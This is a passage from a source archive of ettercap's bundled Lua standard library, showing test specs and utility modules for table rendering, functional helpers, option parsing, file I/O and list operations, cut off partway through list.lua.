()": - before: subject = { k1 = {1}, k2 = {2}, k3 = {3} } f = table.values - it returns an empty list when subject is empty: expect (f {}).should_equal {} - it makes a list of table values: cmp = function (a, b) return a[1] < b[1] end expect (table.sort (f (subject), cmp)).should_equal {{1}, {2}, {3}} - it does guarantee stable ordering: subject = {} -- is this a good test? or just requiring an implementation quirk? for i = 10000, 1, -1 do table.insert (subject, i) end expect (f (subject)).should_equal (subject) - "it diagnoses non-table arguments": expect ("table expected").should_error (f, nil) expect ("table expected").should_error (f, "foo") - context when requiring the module: - before: extensions = { "clone", "clone_rename", "empty", "invert", "keys", "merge", "new", "size", "sort", "values" } - it returns the unextended module table: for _, api in ipairs (extensions) do if api ~= "sort" then expect (unextended[api]).should_be (nil) end end - it injects an enhanced sort function: expect (unextended.sort).should_not_be (table.sort) - it does not override any other module access points: for api in pairs (unextended) do if api ~= "sort" then expect (table[api]).should_be (unextended[api]) end end ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/000775 000000 000000 00000000000 13711276346 022453 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/.gitignore000775 000000 000000 00000000061 13711276346 024443 0ustar00rootroot000000 000000 /std.lua /luadoc.css /index.html /files /modules ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/CMakeLists.txt000664 000000 000000 00000000375 13711276346 025220 0ustar00rootroot000000 000000 file(GLOB lua_stdlib_files "*.lua") set(VERSION ${LUA_STDLIB_VERSION}) configure_file(std.lua.in ${CMAKE_CURRENT_BINARY_DIR}/std.lua) install(FILES ${CMAKE_CURRENT_BINARY_DIR}/std.lua ${lua_stdlib_files} DESTINATION ${INSTALL_LUA_THIRD_PARTY}) ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/base.lua000664 000000 000000 00000032160 13711276346 024072 0ustar00rootroot000000 000000 --- Adds to the existing global functions module ("base", package.seeall) --- Functional forms of infix operators. -- Defined here so that other modules can write to it. -- @class table -- @name _G.op _G.op = {} require "table_ext" local list = require "list" require "string_ext" --require "io_ext" FIXME: allow loops local strbuf = require "strbuf" --- Require a module with a particular version -- @param module module to require -- @param min lowest acceptable version (default: any) -- @param too_big lowest version that is too big (default: none) -- @pattern pattern to match version in module.version or -- module.VERSION (default: ".*[%.%d]+" function _G.require_version (module, min, too_big, pattern) local function version_to_list (v) return list.new (string.split (v, "%.")) end local function module_version (module, pattern) return version_to_list (string.match (module.version or module._VERSION, pattern or ".*[%.%d]+")) end local m = require (module) if min then assert (module_version (m, pattern) >= version_to_list (min)) end if too_big then assert (module_version (m, pattern) < version_to_list (too_big)) end return m end --- Return given metamethod, if any, or nil. -- @param x object to get metamethod of -- @param n name of metamethod to get -- @return metamethod function or nil if no metamethod or not a -- function function _G.metamethod (x, n) local _, m = pcall (function (x) return getmetatable (x)[n] end, x) if type (m) ~= "function" then m = nil end return m end --- Turn tables into strings with recursion detection. -- N.B. Functions calling render should not recurse, or recursion -- detection will not work. -- @see render_OpenRenderer, render_CloseRenderer -- @see render_ElementRenderer, render_PairRenderer -- @see render_SeparatorRenderer -- @param x object to convert to string -- @param open open table renderer -- @param close close table renderer -- @param elem element renderer -- @param pair pair renderer -- @param sep separator renderer -- @return string representation function _G.render (x, open, close, elem, pair, sep, roots) local function stop_roots (x) return roots[x] or render (x, open, close, elem, pair, sep, table.clone (roots)) end roots = roots or {} if type (x) ~= "table" or metamethod (x, "__tostring") then return elem (x) else local s = strbuf.new () s = s .. open (x) roots[x] = elem (x) local i, v = nil, nil for j, w in pairs (x) do s = s .. sep (x, i, v, j, w) .. pair (x, j, w, stop_roots (j), stop_roots (w)) i, v = j, w end s = s .. sep(x, i, v, nil, nil) .. close (x) return s:tostring () end end --- -- @class function -- @name render_OpenRenderer -- @param t table -- @return open table string --- -- @class function -- @name render_CloseRenderer -- @param t table -- @return close table string --- -- @class function -- @name render_ElementRenderer -- @param e element -- @return element string --- -- @class function -- @name render_PairRenderer -- N.B. the function should not try to render i and v, or treat -- them recursively. -- @param t table -- @param i index -- @param v value -- @param is index string -- @param vs value string -- @return element string --- -- @class function -- @name render_SeparatorRenderer -- @param t table -- @param i preceding index (nil on first call) -- @param v preceding value (nil on first call) -- @param j following index (nil on last call) -- @param w following value (nil on last call) -- @return separator string --- Extend tostring to work better on tables. -- The original tostring is available as _tostring. -- @class function -- @name _G.tostring -- @param x object to convert to string -- @return string representation _G._tostring = tostring -- make original tostring available local _tostring = tostring function _G.tostring (x) return render (x, function () return "{" end, function () return "}" end, _tostring, function (t, _, _, i, v) return i .. "=" .. v end, function (_, i, _, j) if i and j then return "," end return "" end) end --- Pretty-print a table. -- @param t table to print -- @param indent indent between levels ["\t"] -- @param spacing space before every line -- @return pretty-printed string function _G.prettytostring (t, indent, spacing) indent = indent or "\t" spacing = spacing or "" return render (t, function () local s = spacing .. "{" spacing = spacing .. indent return s end, function () spacing = string.gsub (spacing, indent .. "$", "") return spacing .. "}" end, function (x) if type (x) == "string" then return string.format ("%q", x) else return tostring (x) end end, function (x, i, v, is, vs) local s = spacing .. "[" if type (i) == "table" then s = s .. "\n" end s = s .. is if type (i) == "table" then s = s .. "\n" end s = s .. "] =" if type (v) == "table" then s = s .. "\n" else s = s .. " " end s = s .. vs return s end, function (_, i) local s = "\n" if i then s = "," .. s end return s end) end --- Turn an object into a table according to __totable metamethod. -- @param x object to turn into a table -- @return table or nil function _G.totable (x) local m = metamethod (x, "__totable") if m then return m (x) elseif type (x) == "table" then return x else return nil end end --- Convert a value to a string. -- The string can be passed to dostring to retrieve the value. --
TODO: Make it work for recursive tables. -- @param x object to pickle -- @return string such that eval (s) is the same value as x function _G.pickle (x) if type (x) == "string" then return string.format ("%q", x) elseif type (x) == "number" or type (x) == "boolean" or type (x) == "nil" then return tostring (x) else x = totable (x) or x if type (x) == "table" then local s, sep = "{", "" for i, v in pairs (x) do s = s .. sep .. "[" .. pickle (i) .. "]=" .. pickle (v) sep = "," end s = s .. "}" return s else die ("cannot pickle " .. tostring (x)) end end end --- Identity function. -- @param ... -- @return the arguments passed to the function function _G.id (...) return ... end --- Turn a tuple into a list. -- @param ... tuple -- @return list function _G.pack (...) return {...} end --- Partially apply a function. -- @param f function to apply partially -- @param ... arguments to bind -- @return function with ai already bound function _G.bind (f, ...) local fix = {...} return function (...) return f (unpack (list.concat (fix, {...}))) end end --- Curry a function. -- @param f function to curry -- @param n number of arguments -- @return curried version of f function _G.curry (f, n) if n <= 1 then return f else return function (x) return curry (bind (f, x), n - 1) end end end --- Compose functions. -- @param f1...fn functions to compose -- @return composition of f1 ... fn function _G.compose (...) local arg = {...} local fns, n = arg, #arg return function (...) local arg = {...} for i = n, 1, -1 do arg = {fns[i] (unpack (arg))} end return unpack (arg) end end --- Memoize a function, by wrapping it in a functable. -- @param fn function that returns a single result -- @return memoized function function _G.memoize (fn) return setmetatable ({}, { __call = function (self, ...) local k = tostring ({...}) local v = self[k] if v == nil then v = fn (...) self[k] = v end return v end }) end --- Evaluate a string. -- @param s string -- @return value of string function _G.eval (s) return loadstring ("return " .. s)() end --- An iterator like ipairs, but in reverse. -- @param t table to iterate over -- @return iterator function -- @return the table, as above -- @return #t + 1 function _G.ripairs (t) return function (t, n) n = n - 1 if n > 0 then return n, t[n] end end, t, #t + 1 end --- -- @class function -- @name tree_Iterator -- @param n current node -- @return type ("leaf", "branch" (pre-order) or "join" (post-order)) -- @return path to node ({i1...ik}) -- @return node local function _nodes (it, tr) local p = {} local function visit (n) if type (n) == "table" then coroutine.yield ("branch", p, n) for i, v in it (n) do table.insert (p, i) visit (v) table.remove (p) end coroutine.yield ("join", p, n) else coroutine.yield ("leaf", p, n) end end return coroutine.wrap (visit), tr end --- Tree iterator. -- @see tree_Iterator -- @param tr tree to iterate over -- @return iterator function -- @return the tree, as above function _G.nodes (tr) return _nodes (pairs, tr) end --- Tree iterator over numbered nodes, in order. -- @see tree_Iterator -- @param tr tree to iterate over -- @return iterator function -- @return the tree, as above function _G.inodes (tr) return _nodes (ipairs, tr) end local function _leaves (it, tr) local function visit (n) if type (n) == "table" then for _, v in it (n) do visit (v) end else coroutine.yield (n) end end return coroutine.wrap (visit), tr end --- Tree iterator which returns just numbered leaves, in order. -- @param tr tree to iterate over -- @return iterator function -- @return the tree, as above function _G.ileaves (tr) return _leaves (ipairs, tr) end --- Tree iterator which returns just leaves. -- @param tr tree to iterate over -- @return iterator function -- @return the tree, as above function _G.leaves (tr) return _leaves (pairs, tr) end --- Collect the results of an iterator. -- @param i iterator -- @return results of running the iterator on its arguments function _G.collect (i, ...) local t = {} for e in i (...) do table.insert (t, e) end return t end --- Map a function over an iterator. -- @param f function -- @param i iterator -- @return result table function _G.map (f, i, ...) local t = {} for e in i (...) do local r = f (e) if r then table.insert (t, r) end end return t end --- Filter an iterator with a predicate. -- @param p predicate -- @param i iterator -- @return result table containing elements e for which p (e) function _G.filter (p, i, ...) local t = {} for e in i (...) do if p (e) then table.insert (t, e) end end return t end --- Fold a binary function into an iterator. -- @param f function -- @param d initial first argument -- @param i iterator -- @return result function _G.fold (f, d, i, ...) local r = d for e in i (...) do r = f (r, e) end return r end --- Extend to allow formatted arguments. -- @param v value to assert -- @param f format -- @param ... arguments to format -- @return value function _G.assert (v, f, ...) if not v then if f == nil then f = "" end error (string.format (f, ...)) end return v end --- Give warning with the name of program and file (if any). -- @param ... arguments for format function _G.warn (...) if prog.name then io.stderr:write (prog.name .. ":") end if prog.file then io.stderr:write (prog.file .. ":") end if prog.line then io.stderr:write (tostring (prog.line) .. ":") end if prog.name or prog.file or prog.line then io.stderr:write (" ") end io.writelines (io.stderr, string.format (...)) end --- Die with error. -- @param ... arguments for format function _G.die (...) warn (...) error () end -- Function forms of operators. -- FIXME: Make these visible in LuaDoc (also list.concat in list) _G.op["[]"] = function (t, s) return t[s] end _G.op["+"] = function (a, b) return a + b end _G.op["-"] = function (a, b) return a - b end _G.op["*"] = function (a, b) return a * b end _G.op["/"] = function (a, b) return a / b end _G.op["and"] = function (a, b) return a and b end _G.op["or"] = function (a, b) return a or b end _G.op["not"] = function (a) return not a end _G.op["=="] = function (a, b) return a == b end _G.op["~="] = function (a, b) return a ~= b end ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/bin.lua000664 000000 000000 00000000747 13711276346 023736 0ustar00rootroot000000 000000 --- Binary data utilities --- Turn a little-endian word into a number local function le_to_number (s) local res = 0 for i = #s, 1, -1 do res = res * 256 + string.byte (s, i) end return res end --- Turn a little-endian word into a hex string local function le_to_hex (s) local res = "" for i = 1, #s do res = res .. string.format ("%.2x", string.byte (s, i)) end return res end local M = { le_to_number = le_to_number, le_to_hex = le_to_hex, } return M ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/debug_ext.lua000664 000000 000000 00000004311 13711276346 025123 0ustar00rootroot000000 000000 --- Additions to the debug module module ("debug", package.seeall) require "debug_init" require "io_ext" require "string_ext" --- To activate debugging set _DEBUG either to any true value -- (equivalent to {level = 1}), or as documented below. -- @class table -- @name _DEBUG -- @field level debugging level -- @field call do call trace debugging -- @field std do standard library debugging (run examples & test code) --- Print a debugging message -- @param n debugging level, defaults to 1 -- @param ... objects to print (as for print) function say (n, ...) local level = 1 local arg = {n, ...} if type (arg[1]) == "number" then level = arg[1] table.remove (arg, 1) end if _DEBUG and ((type (_DEBUG) == "table" and type (_DEBUG.level) == "number" and _DEBUG.level >= level) or level <= 1) then io.writelines (io.stderr, table.concat (list.map (tostring, arg), "\t")) end end --- -- The global function debug is an abbreviation for -- debug.say (1, ...) -- @class function -- @name debug -- @see say getmetatable (_M).__call = function (self, ...) say (1, ...) end --- Trace function calls -- Use as debug.sethook (trace, "cr"), which is done automatically -- when _DEBUG.call is set. -- Based on test/trace-calls.lua from the Lua distribution. -- @class function -- @name trace -- @param event event causing the call local level = 0 function trace (event) local t = getinfo (3) local s = " >>> " .. string.rep (" ", level) if t ~= nil and t.currentline >= 0 then s = s .. t.short_src .. ":" .. t.currentline .. " " end t = getinfo (2) if event == "call" then level = level + 1 else level = math.max (level - 1, 0) end if t.what == "main" then if event == "call" then s = s .. "begin " .. t.short_src else s = s .. "end " .. t.short_src end elseif t.what == "Lua" then s = s .. event .. " " .. (t.name or "(Lua)") .. " <" .. t.linedefined .. ":" .. t.short_src .. ">" else s = s .. event .. " " .. (t.name or "(C)") .. " [" .. t.what .. "]" end io.writelines (io.stderr, s) end -- Set hooks according to _DEBUG if type (_DEBUG) == "table" and _DEBUG.call then sethook (trace, "cr") end ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/debug_init.lua000664 000000 000000 00000000057 13711276346 025271 0ustar00rootroot000000 000000 -- Debugging is on by default _G._DEBUG = true ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/fstable.lua000664 000000 000000 00000005573 13711276346 024610 0ustar00rootroot000000 000000 --- Tables mapped to the filing system -- Only string keys are permitted; package.dirsep characters are -- converted to underscores. -- Values are stored as strings (converted by tostring). -- As with disk operations, a table's elements must be set to nil -- (deleted) before the table itself can be set to nil. require "io_ext" require "table_ext" require "io_ext" require "lfs" require "posix" local new local function fsnext (dir) local f repeat f = dir:next () until f ~= "." and f ~= ".." return f end -- Metamethods for persistent tables local metatable = {} metatable.__index = function (t, k) local path = io.catfile (getmetatable (t).directory, k) local attrs = lfs.attributes (path) if attrs then if attrs.mode == "file" then return io.slurp (path) elseif attrs.mode == "directory" then return new (path) end end return attrs end metatable.__newindex = function (t, k, v) local ty = type (v) if ty == "thread" or ty == "function" or ty == "userdata" then error ("cannot persist a " .. ty .. "") elseif type (k) ~= "string" then error ("keys of persistent tables must be of type string") else k = string.gsub (k, package.dirsep, "_") local path = io.catfile (getmetatable (t).directory, k) local vm = getmetatable (v) if v == nil then os.remove (path) elseif type (v) ~= "table" then local h = io.open (path, "w") h:write (tostring (v)) h:close () elseif type (vm) == "table" and vm.metatable == metatable then -- To match Lua semantics we'd hardlink, but that's not allowed for directories local ok, errmsg = posix.link (vm.directory, path, true) else local ok, errmsg = lfs.mkdir (path) if not ok then error (errmsg) end new (path, v) end end end metatable.__pairs = function (t) local _, dir = lfs.dir (getmetatable (t).directory) return function (dir) local f = fsnext (dir) if f then return f, t[f] end end, dir end metatable.__ipairs = function (t) local _, dir = lfs.dir (getmetatable (t).directory) return function (dir, i) local f = fsnext (dir) if f then return i + 1, f end end, dir, 0 end --- Bind a directory to a table -- @param path directory path -- @param t table to merge with directory -- @return table bound to directory function new (path, t) if not path:find ("^" .. package.dirsep) then path = io.catfile (lfs.currentdir (), path) end if lfs.attributes (path, "mode") ~= "directory" then error ("`" .. path .. "' does not exist or is not a directory") end local m = table.clone (metatable) m.directory = path m.metatable = metatable local d = setmetatable ({}, m) if t then for i, v in pairs (t) do d[i] = v end end return d end local M = { new = new, } return M ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/getopt.lua000664 000000 000000 00000020645 13711276346 024467 0ustar00rootroot000000 000000 --- Simplified getopt, based on Svenne Panne's Haskell GetOpt.
-- Usage: --
    --
  • prog = {< -- name = , -- [usage = ,] -- [options = { -- {{[, ...]}, , [ [, ]]}, -- ... -- },] -- [banner = ,] -- [purpose = ,] -- [notes = ] -- }
    • --
  • The type of option argument is one of Req(uired), -- Opt(ional)
    • --
  • The varis a descriptive name for the option argument.
    • --
  • getopt.processArgs (prog)
    • --
  • Options take a single dash, but may have a double dash.
    • --
  • Arguments may be given as -opt=arg or -opt arg.
    • --
  • If an option taking an argument is given multiple times, only the -- last value is returned; missing arguments are returned as 1.
    • --
-- getOpt, usageInfo and usage can be called directly (see -- below, and the example at the end). Set _DEBUG.std to a non-nil -- value to run the example. --
    --
  • TODO: Wrap all messages; do all wrapping in processArgs, not -- usageInfo; use sdoc-like library (see string.format todos).
    • --
  • TODO: Don't require name to be repeated in banner.
    • --
  • TODO: Store version separately (construct banner?).
    • --
require "base" local list = require "list" require "string_ext" local Object = require "object" local M = { opt = {}, } --- Perform argument processing -- @param argIn list of command-line args -- @param options options table -- @param stop_at_nonopt if true, stop option processing at first non-option -- @return table of remaining non-options -- @return table of option key-value list pairs -- @return table of error messages local function getOpt (argIn, options, stop_at_nonopt) local noProcess = nil local argOut, optOut, errors = {[0] = argIn[0]}, {}, {} -- get an argument for option opt local function getArg (o, opt, arg, oldarg) if o.type == nil then if arg ~= nil then table.insert (errors, "option `" .. opt .. "' doesn't take an argument") end else if arg == nil and argIn[1] and string.sub (argIn[1], 1, 1) ~= "-" then arg = argIn[1] table.remove (argIn, 1) end if arg == nil and o.type == "Req" then table.insert (errors, "option `" .. opt .. "' requires an argument `" .. o.var .. "'") return nil end end return arg or 1 -- make sure arg has a value end local function parseOpt (opt, arg) local o = options.name[opt] if o ~= nil then o = o or {name = {opt}} optOut[o.name[1]] = optOut[o.name[1]] or {} table.insert (optOut[o.name[1]], getArg (o, opt, arg, optOut[o.name[1]])) else table.insert (errors, "unrecognized option `-" .. opt .. "'") end end while argIn[1] do local v = argIn[1] table.remove (argIn, 1) local _, _, dash, opt = string.find (v, "^(%-%-?)([^=-][^=]*)") local _, _, arg = string.find (v, "=(.*)$") if not dash and stop_at_nonopt then noProcess = true end if v == "--" then noProcess = true elseif not dash or noProcess then -- non-option table.insert (argOut, v) else -- option parseOpt (opt, arg) end end return argOut, optOut, errors end -- Object that defines a single Option entry. local Option = Object {_init = {"name", "desc", "type", "var"}} --- Options table constructor: adds lookup tables for the option names local function makeOptions (t) local options, name = {}, {} local function appendOpt (v, nodupes) local dupe = false v = Option (v) for s in list.elems (v.name) do if name[s] then dupe = true end name[s] = v end if not dupe or nodupes ~= true then if dupe then warn ("duplicate option '%s'", s) end for s in list.elems (v.name) do name[s] = v end options = list.concat (options, {v}) end end for v in list.elems (t or {}) do appendOpt (v) end -- Unless they were supplied already, add version and help options appendOpt ({{"version", "V"}, "print version information, then exit"}, true) appendOpt ({{"help", "h"}, "print this help, then exit"}, true) options.name = name return options end --- Produce usage info for the given options -- @param header header string -- @param optDesc option descriptors -- @param pageWidth width to format to [78] -- @return formatted string local function usageInfo (header, optDesc, pageWidth) pageWidth = pageWidth or 78 -- Format the usage info for a single option -- @param opt the option table -- @return options -- @return description local function fmtOpt (opt) local function fmtName (o) return (#o > 1 and "--" or "-") .. o end local function fmtArg () if opt.type == nil then return "" elseif opt.type == "Req" then return "=" .. opt.var else return "[=" .. opt.var .. "]" end end local textName = list.reverse (list.map (fmtName, opt.name)) textName[#textName] = textName[#textName] .. fmtArg () local indent = "" if #opt.name == 1 and #opt.name[1] > 1 then indent = " " end return {indent .. table.concat ({table.concat (textName, ", ")}, ", "), opt.desc} end local function sameLen (xs) local n = math.max (unpack (list.map (string.len, xs))) for i, v in pairs (xs) do xs[i] = string.sub (v .. string.rep (" ", n), 1, n) end return xs, n end local function paste (x, y) return " " .. x .. " " .. y end local function wrapper (w, i) return function (s) return string.wrap (s, w, i, 0) end end local optText = "" if #optDesc > 0 then local cols = list.transpose (list.map (fmtOpt, optDesc)) local width cols[1], width = sameLen (cols[1]) cols[2] = list.map (wrapper (pageWidth, width + 4), cols[2]) optText = "\n\n" .. table.concat (list.mapWith (paste, list.transpose ({sameLen (cols[1]), cols[2]})), "\n") end return header .. optText end --- Emit a usage message. -- @param prog table of named parameters local function usage (prog) local usage = "[OPTION]... [FILE]..." local purpose, description, notes = "", "", "" if prog.usage then usage = prog.usage end usage = "Usage: " .. prog.name .. " " .. usage if prog.purpose then purpose = "\n\n" .. prog.purpose end if prog.description then for para in list.elems (string.split (prog.description, "\n")) do description = description .. "\n\n" .. string.wrap (para) end end if prog.notes then notes = "\n\n" if not string.find (prog.notes, "\n") then notes = notes .. string.wrap (prog.notes) else notes = notes .. prog.notes end end local header = usage .. purpose .. description io.writelines (usageInfo (header, prog.options) .. notes) end local function version (prog) local version = prog.version or prog.name or "unknown version!" if prog.copyright then version = version .. "\n\n" .. prog.copyright end io.writelines (version) end --- Simple getOpt wrapper. -- If the caller didn't supply their own already, -- adds --version/-V and -- --help/-h options automatically; -- stops program if there was an error, or if --help or -- --version was used. -- @param prog table of named parameters -- @param ... extra arguments for getOpt local function processArgs (prog, ...) local totArgs = #_G.arg local errors prog.options = makeOptions (prog.options) _G.arg, M.opt, errors = getOpt (_G.arg, prog.options, ...) local opt = M.opt if (opt.version or opt.help) and prog.banner then io.writelines (prog.banner) end if #errors > 0 then local name = prog.name prog.name = nil if #errors > 0 then warn (name .. ": " .. table.concat (errors, "\n")) warn (name .. ": Try '" .. (arg[0] or name) .. " --help' for more help") end if #errors > 0 then error () end elseif opt.version then version (prog) elseif opt.help then usage (prog) end if opt.version or opt.help then os.exit () end end -- Public interface return table.merge (M, { getOpt = getOpt, processArgs = processArgs, usage = usage, usageInfo = usageInfo, }) ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/io_ext.lua000664 000000 000000 00000005573 13711276346 024457 0ustar00rootroot000000 000000 --- Additions to the io module module ("io", package.seeall) require "base" local package_unext = require "package_ext" -- Get file handle metatable local file_metatable = getmetatable (io.stdin) -- Get an input file handle. -- @param h file handle or name (default: io.input ()) -- @return file handle, or nil on error local function input_handle (h) if h == nil then h = input () elseif _G.type (h) == "string" then h = io.open (h) end return h end --- Slurp a file handle. -- @param h file handle or name (default: io.input ()) -- @return contents of file or handle, or nil if error function slurp (h) h = input_handle (h) if h then local s = h:read ("*a") h:close () return s end end --- Read a file or file handle into a list of lines. -- @param h file handle or name (default: io.input ()); -- if h is a handle, the file is closed after reading -- @return list of lines function readlines (h) h = input_handle (h) local l = {} for line in h:lines () do table.insert (l, line) end h:close () return l end file_metatable.readlines = readlines --- Write values adding a newline after each. -- @param h file handle (default: io.output () -- @param ... values to write (as for write) function writelines (h, ...) if io.type (h) ~= "file" then io.write (h, "\n") h = io.output () end for v in ileaves ({...}) do h:write (v, "\n") end end file_metatable.writelines = writelines --- Split a directory path into components. -- Empty components are retained: the root directory becomes {"", ""}. -- @param path path -- @return list of path components function splitdir (path) return string.split (path, package.dirsep) end --- Concatenate one or more directories and a filename into a path. -- @param ... path components -- @return path function catfile (...) return table.concat ({...}, package.dirsep) end --- Concatenate two or more directories into a path, removing the trailing slash. -- @param ... path components -- @return path function catdir (...) return (string.gsub (catfile (...), "^$", package.dirsep)) end --- Perform a shell command and return its output. -- @param c command -- @return output, or nil if error function shell (c) return io.slurp (io.popen (c)) end --- Process files specified on the command-line. -- If no files given, process io.stdin; in list of files, -- - means io.stdin. --
FIXME: Make the file list an argument to the function. -- @param f function to process files with, which is passed -- (name, arg_no) function processFiles (f) -- N.B. "arg" below refers to the global array of command-line args if #arg == 0 then table.insert (arg, "-") end for i, v in ipairs (arg) do if v == "-" then io.input (io.stdin) else io.input (v) end f (v, i) end end ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/lcs.lua000664 000000 000000 00000003060 13711276346 023736 0ustar00rootroot000000 000000 --- Longest Common Subsequence algorithm. -- After pseudo-code in lecture -- notes by David Eppstein. -- Find common subsequences. -- @param a first sequence -- @param b second sequence -- @return list of common subsequences -- @return the length of a -- @return the length of b local function commonSubseqs (a, b) local l, m, n = {}, #a, #b for i = m + 1, 1, -1 do l[i] = {} for j = n + 1, 1, -1 do if i > m or j > n then l[i][j] = 0 elseif a[i] == b[j] then l[i][j] = 1 + l[i + 1][j + 1] else l[i][j] = math.max (l[i + 1][j], l[i][j + 1]) end end end return l, m, n end --- Find the longest common subsequence of two sequences. -- The sequence objects must have an __append metamethod. -- This is provided by string_ext for strings, and by -- list for lists. -- @param a first sequence -- @param b second sequence -- @param s an empty sequence of the same type, to hold the result -- @return the LCS of a and b local function longestCommonSubseq (a, b, s) local l, m, n = commonSubseqs (a, b) local i, j = 1, 1 local f = getmetatable (s).__append while i <= m and j <= n do if a[i] == b[j] then s = f (s, a[i]) i = i + 1 j = j + 1 elseif l[i + 1][j] >= l[i][j + 1] then i = i + 1 else j = j + 1 end end return s end -- Public interface local M = { longestCommonSubseq = longestCommonSubseq, } return M ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/list.lua000664 000000 000000 00000026324 13711276346 024140 0ustar00rootroot000000 000000 --- Tables as lists. require "base" local new -- forward declaration --- An iterator over the elements of a list. -- @param l list to iterate over -- @return iterator function which returns successive elements of the list -- @return the list l as above -- @return true local function elems (l) local n = 0 return function (l) n = n + 1 if n <= #l then return l[n] end end, l, true end --- An iterator over the elements of a list, in reverse. -- @param l list to iterate over -- @return iterator function which returns precessive elements of the list -- @return the list l as above -- @return true local function relems (l) local n = #l + 1 return function (l) n = n - 1 if n > 0 then return l[n] end end, l, true end --- Map a function over a list. -- @param f function -- @param l list -- @return result list {f (l[1]), ..., f (l[#l])} local function map (f, l) return _G.map (f, elems, l) end --- Map a function over a list of lists. -- @param f function -- @param ls list of lists -- @return result list {f (unpack (ls[1]))), ..., f (unpack (ls[#ls]))} local function mapWith (f, l) return _G.map (compose (f, unpack), elems, l) end --- Filter a list according to a predicate. -- @param p predicate (function of one argument returning a boolean) -- @param l list of lists -- @return result list containing elements e of -- l for which p (e) is true local function filter (p, l) return _G.filter (p, elems, l) end --- Return a sub-range of a list. (The equivalent of string.sub -- on strings; negative list indices count from the end of the list.) -- @param l list -- @param from start of range (default: 1) -- @param to end of range (default: #l) -- @return {l[from], ..., l[to]} local function sub (l, from, to) local r = new () local len = #l from = from or 1 to = to or len if from < 0 then from = from + len + 1 end if to < 0 then to = to + len + 1 end for i = from, to do table.insert (r, l[i]) end return r end --- Return a list with its first element removed. -- @param l list -- @return {l[2], ..., l[#l]} local function tail (l) return sub (l, 2) end --- Fold a binary function through a list left associatively. -- @param f function -- @param e element to place in left-most position -- @param l list -- @return result local function foldl (f, e, l) return fold (f, e, elems, l) end --- Fold a binary function through a list right associatively. -- @param f function -- @param e element to place in right-most position -- @param l list -- @return result local function foldr (f, e, l) return fold (function (x, y) return f (y, x) end, e, relems, l) end --- Prepend an item to a list. -- @param l list -- @param x item -- @return {x, unpack (l)} local function cons (l, x) return {x, unpack (l)} end --- Append an item to a list. -- @param l list -- @param x item -- @return {l[1], ..., l[#l], x} local function append (l, x) local r = {unpack (l)} table.insert (r, x) return r end --- Concatenate lists. -- @param ... lists -- @return {l1[1], ..., -- l1[#l1], ..., ln[1], ..., -- ln[#ln]} local function concat (...) local r = new () for l in elems ({...}) do for v in elems (l) do table.insert (r, v) end end return r end --- Repeat a list. -- @param l list -- @param n number of times to repeat -- @return n copies of l appended together local function rep (l, n) local r = new () for i = 1, n do r = concat (r, l) end return r end --- Reverse a list. -- @param l list -- @return list {l[#l], ..., l[1]} local function reverse (l) local r = new () for i = #l, 1, -1 do table.insert (r, l[i]) end return r end --- Transpose a list of lists. -- This function in Lua is equivalent to zip and unzip in more -- strongly typed languages. -- @param ls {{l1,1, ..., l1,c}, ..., -- {lr,1, ..., lr,c}} -- @return {{l1,1, ..., lr,1}, ..., -- {l1,c, ..., lr,c}} local function transpose (ls) local rs, len = new (), #ls for i = 1, math.max (unpack (map (function (l) return #l end, ls))) do rs[i] = new () for j = 1, len do rs[i][j] = ls[j][i] end end return rs end --- Zip lists together with a function. -- @param f function -- @param ls list of lists -- @return {f (ls[1][1], ..., ls[#ls][1]), ..., f (ls[1][N], ..., ls[#ls][N]) -- where N = max {map (function (l) return #l end, ls)} local function zipWith (f, ls) return mapWith (f, transpose (ls)) end --- Project a list of fields from a list of tables. -- @param f field to project -- @param l list of tables -- @return list of f fields local function project (f, l) return map (function (t) return t[f] end, l) end --- Turn a table into a list of pairs. --
FIXME: Find a better name. -- @param t table {i1=v1, ..., -- in=vn} -- @return list {{i1, v1}, ..., -- {in, vn}} local function enpair (t) local ls = new () for i, v in pairs (t) do table.insert (ls, {i, v}) end return ls end --- Turn a list of pairs into a table. --
FIXME: Find a better name. -- @param ls list {{i1, v1}, ..., -- {in, vn}} -- @return table {i1=v1, ..., -- in=vn} local function depair (ls) local t = {} for v in elems (ls) do t[v[1]] = v[2] end return t end --- Flatten a list. -- @param l list to flatten -- @return flattened list local function flatten (l) local r = new () for v in ileaves (l) do table.insert (r, v) end return r end --- Shape a list according to a list of dimensions. -- -- Dimensions are given outermost first and items from the original -- list are distributed breadth first; there may be one 0 indicating -- an indefinite number. Hence, {0} is a flat list, -- {1} is a singleton, {2, 0} is a list of -- two lists, and {0, 2} is a list of pairs. --
-- Algorithm: turn shape into all positive numbers, calculating -- the zero if necessary and making sure there is at most one; -- recursively walk the shape, adding empty tables until the bottom -- level is reached at which point add table items instead, using a -- counter to walk the flattened original list. --
-- @param s {d1, ..., dn} -- @param l list to reshape -- @return reshaped list -- FIXME: Use ileaves instead of flatten (needs a while instead of a -- for in fill function) local function shape (s, l) l = flatten (l) -- Check the shape and calculate the size of the zero, if any local size = 1 local zero for i, v in ipairs (s) do if v == 0 then if zero then -- bad shape: two zeros return nil else zero = i end else size = size * v end end if zero then s[zero] = math.ceil (#l / size) end local function fill (i, d) if d > #s then return l[i], i + 1 else local r = new () for j = 1, s[d] do local e e, i = fill (i, d + 1) table.insert (r, e) end return r, i end end return (fill (1, 1)) end --- Make an index of a list of tables on a given field -- @param f field -- @param l list of tables {t1, ..., -- tn} -- @return index {t1[f]=1, ..., -- tn[f]=n} local function indexKey (f, l) local r = new () for i, v in ipairs (l) do local k = v[f] if k then r[k] = i end end return r end --- Copy a list of tables, indexed on a given field -- @param f field whose value should be used as index -- @param l list of tables {i1=t1, ..., -- in=tn} -- @return index {t1[f]=t1, ..., -- tn[f]=tn} local function indexValue (f, l) local r = new () for i, v in ipairs (l) do local k = v[f] if k then r[k] = v end end return r end permuteOn = indexValue --- Compare two lists element by element left-to-right -- @param l first list -- @param m second list -- @return -1 if l is less than m, 0 if they -- are the same, and 1 if l is greater than m local function compare (l, m) for i = 1, math.min (#l, 